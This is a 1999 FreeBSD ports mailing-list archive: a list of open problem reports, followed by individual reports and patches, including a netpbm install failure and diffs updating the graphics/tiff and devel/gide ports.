New port: graphics/xmrm o [1999/10/17] ports/14381 ports New port: games/x3eyes o [1999/10/23] ports/14469 ports remove port: deskutils/recycler o [1999/10/23] ports/14471 ports remove port: deskutils/xcalendar o [1999/10/23] ports/14478 ports status on port devel/gaa - feedback pleas o [1999/10/25] ports/14515 ports New Tripwire 1.3 Port o [1999/10/27] ports/14554 ports new port: qrash o [1999/10/30] ports/14618 ports New port: security/librc4 o [1999/10/30] ports/14619 ports New port: security/libsasl o [1999/10/31] ports/14633 ports vflib upgrade: 2.24.1->2.24.2 o [1999/11/01] ports/14643 ports A Chinese/English dictionary o [1999/11/01] ports/14644 ports A Big5-localized & XIM-enabled XEmacs por o [1999/11/02] ports/14663 ports aspell-.27.2 port doesn't read dictionari o [1999/11/03] ports/14686 ports New port: pisces IIB (Category: cad) o [1999/11/03] ports/14701 ports New Port o [1999/11/04] ports/14705 ports [NEW PORTS] ports of xls2xml converter an o [1999/11/04] ports/14716 ports This is a port of a Swedish dictionary to o [1999/11/06] ports/14741 ports A summary of the old ispell-language-file o [1999/11/06] ports/14743 ports tcl/e package install hangs sysinstall wi o [1999/11/06] ports/14744 ports tksetathome hangs sysinstall due to lack o [1999/11/06] ports/14745 ports local package fails to install o [1999/11/07] ports/14759 ports Many minor port clean-ups o [1999/11/07] ports/14761 ports More minor port clean-ups o [1999/11/07] ports/14771 ports sslwrap - a new port o [1999/11/08] ports/14783 ports mgetty 1.1.12 always sets clocal o [1999/11/12] ports/14855 ports [NEW PORT] hns (Hyper NIKKI System) f [1999/11/13] ports/14859 ports OpenSSH has no support for the login clas o [1999/11/13] ports/14866 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/11/14] ports/14869 ports New FreeBSD port for jesred-1.2.pl1 o [1999/11/14] ports/14870 ports port submission: lc-1.0 o [1999/11/14] ports/14874 ports Eterm 0.8.10 was released o [1999/11/14] ports/14879 ports New port: lang/starlogo o [1999/11/14] ports/14889 ports [PATCH] dynamic loading for WINE port o [1999/11/14] ports/14894 ports comm/kermit some fixed patch o [1999/11/15] ports/14915 ports Update port: net/generic-nqs o [1999/11/16] ports/14922 ports Want to contribute new package/port o [1999/11/17] ports/14945 ports [NEW PORT] gtkdiff - the diff(1) front-en o [1999/11/17] ports/14956 ports new port: www/screem o [1999/11/17] ports/14957 ports gtk12 requires Cronyx fonts for Russian l o [1999/11/17] ports/14963 ports update for current sox port to include GS o [1999/11/17] ports/14971 ports mkcmd-8.10 port submission o [1999/11/17] ports/14972 ports msrc0-0.6 port submission o [1999/11/18] ports/14986 ports possible bug in ssh1 o [1999/11/18] ports/14991 ports Tcl Data transformations (Tcl-Trf) port o [1999/11/19] ports/14994 ports [ports upgrade] chinese/pine4 from 4.20 t o [1999/11/21] ports/15016 ports New Port: lang/yabasic o [1999/11/21] ports/15021 ports some port installs fail for non-root user o [1999/11/21] ports/15024 ports new port: sysutils/detach o [1999/11/21] ports/15027 ports libmcrypt's distfiles should be updated o [1999/11/21] ports/15030 ports New patch, i3dren o [1999/11/21] ports/15031 ports new port editors/auctex o [1999/11/23] ports/15064 ports New port submittal o [1999/11/25] ports/15093 ports ass man pages to net/dnsutl o [1999/11/25] ports/15094 ports Updated port to ftp/downloader to version o [1999/11/26] ports/15102 ports pgp5 port is broken under -CURRENT o [1999/11/26] ports/15108 ports The print/latex port is thrashing the dis o [1999/11/27] ports/15118 ports wine-991114 once more o [1999/11/27] ports/15124 ports Update port: security/portsentry o [1999/11/27] ports/15126 ports New port: databases/pxtools o [1999/11/27] ports/15130 ports update port: www/hypermail o [1999/11/28] ports/15131 ports new port: devel/kpp o [1999/11/28] ports/15134 ports new port: www/kdreamsite o [1999/11/28] ports/15135 ports new port: devel/cervisia o [1999/11/28] ports/15138 ports New port: deskutils/yank o [1999/11/28] ports/15141 ports update games/gracer to 0.1.4 o [1999/11/28] ports/15142 ports Added DIST_SUBDIR to print/tex port o [1999/11/28] ports/15143 ports update to freetds port (new release) o [1999/11/28] ports/15144 ports New port for hevea o [1999/11/28] ports/15146 ports New port submition emulator/truereality, o [1999/11/28] ports/15147 ports New port: audio/xsidplay o [1999/11/28] ports/15148 ports Update port: graphics/gimp1-i18n o [1999/11/28] ports/15152 ports new port cd-console o [1999/11/28] ports/15154 ports update the p5-SQL-Statement port to versi o [1999/11/28] ports/15155 ports update of p5-ReadLine-Perl to version 0.9 o [1999/11/28] ports/15156 ports update of p5-URI to version 1.04 o [1999/11/28] ports/15159 ports new port: games/blackpenguin o [1999/11/28] ports/15160 ports new port: games/ksnes9x o [1999/11/29] ports/15166 ports update udmsearch port to 2.2.1 o [1999/11/29] ports/15170 ports Update Port: leafnode+ o [1999/11/29] ports/15173 ports Update Etherboot 4.2.11 o [1999/11/29] ports/15176 ports Update port: databases/p5-Mysql o [1999/11/30] ports/15180 ports New audio port submission: soundtracker o [1999/11/30] ports/15188 ports [PATCH] ports/mail/p5-IMAP-Admin upgrade o [1999/11/30] ports/15192 ports Ident2 Daemon o [1999/12/01] ports/15203 ports New FreeBSD port: p5-Term-ANSIColor o [1999/12/01] ports/15209 ports BitchX 1.0 IRC client port o [1999/12/02] ports/15223 ports Update port: audio/mpeg-lib o [1999/12/02] ports/15226 ports Update port: misc/amanda o [1999/12/03] ports/15237 ports update: ports/misc/fd (followup source di o [1999/12/03] ports/15240 ports [PATCH] update xfce port to the 3.2.1 ver o [1999/12/03] ports/15242 ports Update port: japanese/grep o [1999/12/03] ports/15244 ports Update port: japanese/gxditview o [1999/12/03] ports/15246 ports New port: irc/gtk-bitchx o [1999/12/03] ports/15250 ports MC fail to show contents of ZIP archives o [1999/12/04] ports/15252 ports small fix to remove setuid proposal + mas o [1999/12/04] ports/15253 ports update nqc port to 2.0.2 o [1999/12/04] ports/15258 ports New port: misc/party o [1999/12/04] ports/15260 ports New port: games/cursive o [1999/12/04] ports/15261 ports Update port: graphics/kplot3d o [1999/12/04] ports/15263 ports [PATCH] Updates for devel/freelibiberty o [1999/12/04] ports/15264 ports New port: sysutils/orville-write o [1999/12/04] ports/15266 ports UPDATE: ports/www/tidy to Nov 30 version o [1999/12/05] ports/15282 ports unfetchable MASTER_SITES change: archiver o [1999/12/05] ports/15295 ports Update port: rrdtool from version 1.0.7 t o [1999/12/06] ports/15307 ports Port for pstotext o [1999/12/06] ports/15313 ports Persuade graphics/gd to build shared libr o [1999/12/06] ports/15315 ports Xfstt may thrash the drive. o [1999/12/06] ports/15316 ports Can not install ssh2 o [1999/12/06] ports/15319 ports Mailcrypt upgrade from 3.4 to 3.5.5 o [1999/12/06] ports/15320 ports Update port: graphics/gtkgraph o [1999/12/06] ports/15322 ports Update port: textproc/code2html o [1999/12/06] ports/15324 ports Update port: graphics/enfle o [1999/12/06] ports/15326 ports tcsh modification o [1999/12/07] ports/15329 ports amanda24 modification o [1999/12/07] ports/15330 ports editor joe modification o [1999/12/07] ports/15333 ports Update port: archivers/lzo o [1999/12/07] ports/15334 ports Update port: audio/gsm o [1999/12/07] ports/15335 ports Update port: graphics/dore o [1999/12/07] ports/15336 ports Update port: graphics/epstool o [1999/12/07] ports/15338 ports New port: graphics/pngcrush o [1999/12/07] ports/15341 ports XF86Setup in CURRENT is broken on possibl o [1999/12/07] ports/15343 ports Port update: net/icqlib o [1999/12/07] ports/15344 ports Port update: net/kicq o [1999/12/07] ports/15347 ports [New Ports] Xatm o [1999/12/08] ports/15354 ports Update port: security/portsentry o [1999/12/08] ports/15355 ports [PATCH] New version 2.4 of WmakerConf (x1 o [1999/12/08] ports/15359 ports Update port: russian/apache13 o [1999/12/08] ports/15360 ports new port = logcheck o [1999/12/08] ports/15366 ports Update: japanese/libslang o [1999/12/08] ports/15367 ports new ports on linux emulator o [1999/12/09] ports/15372 ports ja-platex2e ports are too obsolete o [1999/12/09] ports/15375 ports Update port: editors/bvi o [1999/12/09] ports/15378 ports Update port: audio/maplay o [1999/12/09] ports/15387 ports ethereal's packet-smb.c calls str*() func o [1999/12/10] ports/15394 ports new port: japanese/kanji18, kanji26, ngra o [1999/12/10] ports/15397 ports port lang/elk: CC not settable. o [1999/12/10] ports/15401 ports Update ports: XEmacs-21.1.8 o [1999/12/10] ports/15402 ports Update port: games/xshisen o [1999/12/10] ports/15407 ports New Port: graphics/chbg o [1999/12/10] ports/15409 ports [PATCH] net/tik shell script to launch `` o [1999/12/11] ports/15423 ports update mail/nmh port to nmh-1.0.2 o [1999/12/11] ports/15424 ports new port: www/kwebsearch o [1999/12/11] ports/15428 ports update port: astro/xearth 1.0 -> 1.1 o [1999/12/11] ports/15431 ports New port: games/baduki o [1999/12/11] ports/15432 ports fix devel/t1lib packaging error o [1999/12/11] ports/15433 ports Small update to flexbackup port. Maintain o [1999/12/12] ports/15434 ports new port: devel/kdevelop o [1999/12/12] ports/15443 ports Updated port: devel/t1lib from 0.9.2 to 1 o [1999/12/12] ports/15444 ports Updated port: graphics/xpdf due to pendin o [1999/12/12] ports/15453 ports Update FreeTDS from 0.47pre2 to 0.50 o [1999/12/12] ports/15454 ports Error in lame-3.51 Makefile o [1999/12/13] ports/15459 ports news/cnews for for gawk o [1999/12/13] ports/15461 ports Update of misc/xdelta port o [1999/12/13] ports/15462 ports New port: cad/cider 213 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 11:36: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 897331518A; Mon, 13 Dec 1999 11:36:07 -0800 (PST) (envelope-from imura@FreeBSD.org) Received: (from imura@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA15706; Mon, 13 Dec 1999 11:36:07 -0800 (PST) (envelope-from imura@FreeBSD.org) Date: Mon, 13 Dec 1999 11:36:07 -0800 (PST) From: Message-Id: <199912131936.LAA15706@freefall.freebsd.org> To: imura@FreeBSD.org, freebsd-ports@FreeBSD.org, imura@FreeBSD.org Subject: Re: ports/15094: Updated port to ftp/downloader to version 1.07.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Updated port to ftp/downloader to version 1.07.1 Responsible-Changed-From-To: freebsd-ports->imura Responsible-Changed-By: imura Responsible-Changed-When: Mon Dec 13 11:29:52 PST 1999 Responsible-Changed-Why: I'll take it. The following is a mail I sent to Mario. I forgot to Cc gnats. :-( --- OK. > As none arrived, I considered appropriate the submition of a > PR. I know that I could/should have waited more but the submition of the PR > would give the port's author a pointer in case his unreachable state was due to a communication/network problem between our parts. > If this is not due process, I apologize. If so, please advise me so > that I won't commit the same mistake twice as I plan to contribute more > actively in the future. > I can insist with the author if you prefer but if you add the 1 1/2 > weeks to the time this PR waited for processing, enough time elapsed for > some sort of response. Please write like "I waited ... days, but maintainer says nothing" next time, because we can't determine if we should commit. (It is too heavy work to let each maintainer know that we have such a PR of yours.) Some maintainer may feel bad if his port was changed out of his hands. :) Anyway, thanks for your great progress. I will commit your change.:) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 11:40:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 71864150BD for ; Mon, 13 Dec 1999 11:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA16097; Mon, 13 Dec 1999 11:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from nohow.demon.co.uk (nohow.demon.co.uk [212.228.18.189]) by hub.freebsd.org (Postfix) with ESMTP id F151E1514F for ; Mon, 13 Dec 1999 11:35:06 -0800 (PST) (envelope-from noway@nohow.demon.co.uk) Received: (from noway@localhost) by nohow.demon.co.uk (8.9.3/8.9.3) id TAA16804; Mon, 13 Dec 1999 19:34:59 GMT (envelope-from noway) Message-Id: <199912131934.TAA16804@nohow.demon.co.uk> Date: Mon, 13 Dec 1999 19:34:59 GMT From: Jose Marques Reply-To: noway@nohow.demon.co.uk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15463: new port net/sagemerlin contains work directory Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15463 >Category: ports >Synopsis: new port net/sagemerlin contains work directory >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 11:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jose Marques >Release: FreeBSD 3.4-RC i386 >Organization: None >Environment: >Description: Having just run CVSup I notice the the net/sagemerlin port has been checked in with it's work directory in place. >How-To-Repeat: CVSup >Fix: cd /usr/ports/net/sagemerlin make clean >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 11:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 30A401514F for ; Mon, 13 Dec 1999 11:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA17022; Mon, 13 Dec 1999 11:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A85B414A2E; Mon, 13 Dec 1999 11:49:38 -0800 (PST) Message-Id: <19991213194938.A85B414A2E@hub.freebsd.org> Date: Mon, 13 Dec 1999 11:49:38 -0800 (PST) From: camel@avias.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15464: can't install latest netpbm from ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15464 >Category: ports >Synopsis: can't install latest netpbm from ports >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 11:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ilya Naumov >Release: 4.0-CURRENT >Organization: NIIAVIA >Environment: FreeBSD camel.avias.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Fri Dec 10 13:24:39 MSK 1999 root@camel.avias.com:/usr/src/sys/compile/CAMEL i386 >Description: can't install latest netpbm from ports. it compiles ok, but "makre install" fails with the following diags: [some lines skipped] installing man pages in ./pbm... + echo+ cut atktopbm.1 -f1 -d. + MNAME=atktopbm + rm -f /usr/X11R6/man/man1/atktopbm.1 + install -c -m 0444 atktopbm.1 /usr/X11R6/man/man1/atktopbm.1 + /usr/X11R6/man/man1/atktopbm.1 /usr/X11R6/man/man1/atktopbm.1: permission denied *** Error code 126 Stop in /usr/ports/graphics/netpbm/work/netpbm/pbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm/work/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. >How-To-Repeat: type "make install" >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:20:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 06FE115202 for ; Mon, 13 Dec 1999 12:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20105; Mon, 13 Dec 1999 12:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CB597151F1; Mon, 13 Dec 1999 12:15:43 -0800 (PST) Message-Id: <19991213201543.CB597151F1@hub.freebsd.org> Date: Mon, 13 Dec 1999 12:15:43 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15467: Update port: graphics/tiff Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15467 >Category: ports >Synopsis: Update port: graphics/tiff >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:20:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Supported MLINKS * Fixed pkg/PLIST.nodocs >How-To-Repeat: >Fix: diff -urN /usr/ports/graphics/tiff/Makefile graphics/tiff/Makefile --- /usr/ports/graphics/tiff/Makefile Sun Dec 5 20:14:41 1999 +++ graphics/tiff/Makefile Tue Dec 14 02:19:43 1999 @@ -42,32 +42,70 @@ rgb2ycbcr.1 sgi2tiff.1 thumbnail.1 tiff2bw.1 tiff2ps.1 tiffcmp.1 \ tiffcp.1 tiffdither.1 tiffdump.1 tiffgt.1 tiffinfo.1 tiffmedian.1 \ tiffsplit.1 tiffsv.1 -MAN3= TIFFCheckTile.3t TIFFClose.3t TIFFComputeStrip.3t TIFFComputeTile.3t \ - TIFFCurrentDirectory.3t TIFFCurrentRow.3t TIFFCurrentStrip.3t \ - TIFFCurrentTile.3t TIFFDefaultStripSize.3t TIFFDefaultTileSize.3t \ - TIFFError.3t TIFFFdOpen.3t TIFFFileName.3t TIFFFileno.3t \ - TIFFFindCODEC.3t TIFFFlush.3t TIFFFlushData.3t TIFFGetField.3t \ - TIFFGetMode.3t TIFFIsByteSwapped.3t TIFFIsMSB2LSB.3t TIFFIsTiled.3t \ - TIFFIsUpSampled.3t TIFFLastDirectory.3t TIFFNumberOfStrips.3t \ - TIFFNumberOfTiles.3t TIFFOpen.3t TIFFPrintDirectory.3t \ - TIFFRGBAImage.3t TIFFRGBAImageBegin.3t TIFFRGBAImageEnd.3t \ - TIFFRGBAImageGet.3t TIFFRGBAImageOK.3t TIFFReadBufferSetup.3t \ +MAN3= TIFFClose.3t TIFFError.3t TIFFFlush.3t TIFFGetField.3t TIFFOpen.3t \ + TIFFPrintDirectory.3t TIFFquery.3t TIFFRGBAImage.3t \ TIFFReadDirectory.3t TIFFReadEncodedStrip.3t TIFFReadEncodedTile.3t \ TIFFReadRGBAImage.3t TIFFReadRGBAStrip.3t TIFFReadRGBATile.3t \ TIFFReadRawStrip.3t TIFFReadRawTile.3t TIFFReadScanline.3t \ - TIFFReadTile.3t TIFFRegisterCODEC.3t TIFFReverseBits.3t \ - TIFFScanlineSize.3t TIFFSetDirectory.3t TIFFSetErrorHandler.3t \ - TIFFSetField.3t TIFFSetSubDirectory.3t TIFFSetWarningHandler.3t \ - TIFFStripSize.3t TIFFSwabArrayOfLong.3t TIFFSwabArrayOfShort.3t \ - TIFFSwabLong.3t TIFFSwabShort.3t TIFFTileRowSize.3t TIFFTileSize.3t \ - TIFFUnRegisterCODEC.3t TIFFVGetField.3t TIFFVSetField.3t \ - TIFFVStripSize.3t TIFFVTileSize.3t TIFFWarning.3t \ - TIFFWriteBufferSetup.3t TIFFWriteDirectory.3t TIFFWriteEncodedStrip.3t \ + TIFFReadTile.3t TIFFSetDirectory.3t TIFFSetField.3t TIFFWarning.3t \ + TIFFWriteDirectory.3t TIFFWriteEncodedStrip.3t \ TIFFWriteEncodedTile.3t TIFFWriteRawStrip.3t TIFFWriteRawTile.3t \ TIFFWriteScanline.3t TIFFWriteTile.3t TIFFbuffer.3t TIFFcodec.3t \ - TIFFfree.3t TIFFmalloc.3t TIFFmemcmp.3t TIFFmemcpy.3t TIFFmemory.3t \ - TIFFmemset.3t TIFFquery.3t TIFFrealloc.3t TIFFsize.3t TIFFstrip.3t \ - TIFFswab.3t TIFFtile.3t libtiff.3t + TIFFmemory.3t TIFFsize.3t TIFFstrip.3t TIFFswab.3t TIFFtile.3t \ + libtiff.3t +MLINKS= TIFFError.3t TIFFSetErrorHandler.3t \ + TIFFFlush.3t TIFFFlushData.3t \ + TIFFGetField.3t TIFFVGetField.3t \ + TIFFOpen.3t TIFFFdOpen.3t \ + TIFFRGBAImage.3t TIFFRGBAImageBegin.3t \ + TIFFRGBAImage.3t TIFFRGBAImageEnd.3t \ + TIFFRGBAImage.3t TIFFRGBAImageGet.3t \ + TIFFRGBAImage.3t TIFFRGBAImageOK.3t \ + TIFFSetDirectory.3t TIFFSetSubDirectory.3t \ + TIFFSetField.3t TIFFVSetField.3t \ + TIFFWarning.3t TIFFSetWarningHandler.3t \ + TIFFbuffer.3t TIFFReadBufferSetup.3t \ + TIFFbuffer.3t TIFFWriteBufferSetup.3t \ + TIFFcodec.3t TIFFFindCODEC.3t \ + TIFFcodec.3t TIFFRegisterCODEC.3t \ + TIFFcodec.3t TIFFUnRegisterCODEC.3t \ + TIFFmemory.3t TIFFfree.3t \ + TIFFmemory.3t TIFFmalloc.3t \ + TIFFmemory.3t TIFFmemcmp.3t \ + TIFFmemory.3t TIFFmemcpy.3t \ + TIFFmemory.3t TIFFmemset.3t \ + TIFFmemory.3t TIFFrealloc.3t \ + TIFFquery.3t TIFFCurrentDirectory.3t \ + TIFFquery.3t TIFFCurrentRow.3t \ + TIFFquery.3t TIFFCurrentStrip.3t \ + TIFFquery.3t TIFFCurrentTile.3t \ + TIFFquery.3t TIFFFileName.3t \ + TIFFquery.3t TIFFFileno.3t \ + TIFFquery.3t TIFFGetMode.3t \ + TIFFquery.3t TIFFIsByteSwapped.3t \ + TIFFquery.3t TIFFIsMSB2LSB.3t \ + TIFFquery.3t TIFFIsTiled.3t \ + TIFFquery.3t TIFFIsUpSampled.3t \ + TIFFquery.3t TIFFLastDirectory.3t \ + TIFFsize.3t TIFFRasterScanlineSize.3t \ + TIFFsize.3t TIFFScanlineSize.3t \ + TIFFstrip.3t TIFFComputeStrip.3t \ + TIFFstrip.3t TIFFDefaultStripSize.3t \ + TIFFstrip.3t TIFFNumberOfStrips.3t \ + TIFFstrip.3t TIFFStripSize.3t \ + TIFFstrip.3t TIFFVStripSize.3t \ + TIFFswab.3t TIFFReverseBits.3t \ + TIFFswab.3t TIFFSwabArrayOfLong.3t \ + TIFFswab.3t TIFFSwabArrayOfShort.3t \ + TIFFswab.3t TIFFSwabLong.3t \ + TIFFswab.3t TIFFSwabShort.3t \ + TIFFtile.3t TIFFCheckTile.3t \ + TIFFtile.3t TIFFComputeTile.3t \ + TIFFtile.3t TIFFDefaultTileSize.3t \ + TIFFtile.3t TIFFNumberOfTiles.3t \ + TIFFtile.3t TIFFTileRowSize.3t \ + TIFFtile.3t TIFFTileSize.3t \ + TIFFtile.3t TIFFVTileSize.3t \ post-install: ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib diff -urN /usr/ports/graphics/tiff/pkg/PLIST.nodocs graphics/tiff/pkg/PLIST.nodocs --- /usr/ports/graphics/tiff/pkg/PLIST.nodocs Thu Nov 25 20:14:30 1999 +++ graphics/tiff/pkg/PLIST.nodocs Sun Dec 12 16:28:15 1999 @@ -17,6 +17,7 @@ bin/tiffmedian bin/tiffsplit include/tiff.h +include/tiffconf.h include/tiffio.h lib/libtiff.a lib/libtiff.so >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:20:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AAF9151E8 for ; Mon, 13 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20092; Mon, 13 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id F0D93151DA; Mon, 13 Dec 1999 12:14:17 -0800 (PST) Message-Id: <19991213201417.F0D93151DA@hub.freebsd.org> Date: Mon, 13 Dec 1999 12:14:17 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15466: Update port: devel/gide to 0.1.6 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15466 >Category: ports >Synopsis: Update port: devel/gide to 0.1.6 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 0.1.5 to 0.1.6 New file: patches/patch-au patches/patch-av Remove file: patches/patch-ak patches/patch-al patches/patch-am patches/patch-an patches/patch-ao patches/patch-ap patches/patch-aq patches/patch-as patches/patch-at >How-To-Repeat: >Fix: diff -urN /usr/ports/devel/gide/Makefile devel/gide/Makefile --- /usr/ports/devel/gide/Makefile Mon Nov 29 20:13:02 1999 +++ devel/gide/Makefile Sun Dec 12 10:01:18 1999 @@ -1,16 +1,16 @@ # New ports collection makefile for: gIDE -# Version required: 0.1.5 +# Version required: 0.1.6 # Date created: 29 Jul 1998 # Whom: rom # # $FreeBSD: ports/devel/gide/Makefile,v 1.30 1999/11/29 02:37:50 jseger Exp $ # -DISTNAME= gIDE-0.1.5 -PKGNAME= gide-0.1.5 +DISTNAME= gIDE-0.1.6 +PKGNAME= gide-0.1.6 CATEGORIES= devel gnome -MASTER_SITES= http://gide.gdev.net/ \ - http://gide.pn.org/ +MASTER_SITES= ${MASTER_SITE_GNOME} +MASTER_SITE_SUBDIR= unstable/sources/gIDE MAINTAINER= ports@FreeBSD.org @@ -19,8 +19,6 @@ GTK_CONFIG?= ${X11BASE}/bin/gtk12-config -FETCH_BEFORE_ARGS= -b - USE_X_PREFIX= yes USE_GMAKE= yes USE_LIBTOOL= yes @@ -36,8 +34,5 @@ post-patch: @${PERL} -pi -e 's|%%LOCALBASE%%|${LOCALBASE}|g' ${WRKSRC}/src/*.c @${PERL} -pi -e 's|%%X11BASE%%|${X11BASE}|g' ${WRKSRC}/src/*.c - -post-install: - ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib .include diff -urN /usr/ports/devel/gide/files/md5 devel/gide/files/md5 --- /usr/ports/devel/gide/files/md5 Thu Oct 21 19:13:41 1999 +++ devel/gide/files/md5 Sun Dec 12 09:35:20 1999 @@ -1 +1 @@ -MD5 (gIDE-0.1.5.tar.gz) = 6b545ee64c5d12b163d3c994de6b4d3f +MD5 (gIDE-0.1.6.tar.gz) = 6e9fa7818e63633fd39c830a1e2c9808 diff -urN /usr/ports/devel/gide/patches/patch-ai devel/gide/patches/patch-ai --- /usr/ports/devel/gide/patches/patch-ai Thu Oct 21 19:13:42 1999 +++ devel/gide/patches/patch-ai Sun Dec 12 09:46:12 1999 @@ -1,18 +1,6 @@ ---- Makefile.in.orig Fri Oct 8 00:40:37 1999 -+++ Makefile.in Mon Oct 18 22:06:39 1999 -@@ -151,10 +151,9 @@ - && CONFIG_FILES=$@ CONFIG_HEADERS= $(SHELL) ./config.status - - $(ACLOCAL_M4): configure.in acinclude.m4 -- cd $(srcdir) && $(ACLOCAL) - - config.status: $(srcdir)/configure -- $(SHELL) ./config.status --recheck -+ - $(srcdir)/configure: $(srcdir)/configure.in $(ACLOCAL_M4) $(CONFIGURE_DEPENDENCIES) - cd $(srcdir) && $(AUTOCONF) - -@@ -277,8 +276,8 @@ +--- Makefile.in.orig Tue Dec 7 04:43:34 1999 ++++ Makefile.in Sun Dec 12 09:45:47 1999 +@@ -321,8 +321,8 @@ distcheck: dist -rm -rf $(distdir) GZIP=$(GZIP) $(TAR) zxf $(distdir).tar.gz @@ -22,8 +10,8 @@ + mkdir -p $(distdir)/=inst dc_install_base=`cd $(distdir)/=inst && pwd`; \ cd $(distdir)/=build \ - && ../configure --srcdir=.. --prefix=$$dc_install_base \ -@@ -302,7 +301,7 @@ + && ../configure --with-included-gettext --srcdir=.. --prefix=$$dc_install_base \ +@@ -346,7 +346,7 @@ -rm -rf $(distdir) distdir: $(DISTFILES) -rm -rf $(distdir) @@ -32,7 +20,7 @@ -chmod 777 $(distdir) here=`cd $(top_builddir) && pwd`; \ top_distdir=`cd $(distdir) && pwd`; \ -@@ -318,7 +317,7 @@ +@@ -362,7 +362,7 @@ done for subdir in $(SUBDIRS); do \ test -d $(distdir)/$$subdir \ @@ -41,7 +29,7 @@ || exit 1; \ chmod 777 $(distdir)/$$subdir; \ (cd $$subdir && $(MAKE) top_distdir=../$(distdir) distdir=../$(distdir)/$$subdir distdir) \ -@@ -404,12 +403,12 @@ +@@ -452,8 +452,8 @@ install-pkgdataDATA: rm -rf $(pkgdatadir) @@ -50,10 +38,5 @@ + mkdir -p $(pkgdatadir) + mkdir -p $(pkgdatadir)/extra cp -p $(pkgdata_DATA) $(pkgdatadir)/extra - - #dist-hook: --# mkdir $(distdir)/extra -+# mkdir -p $(distdir)/extra - # 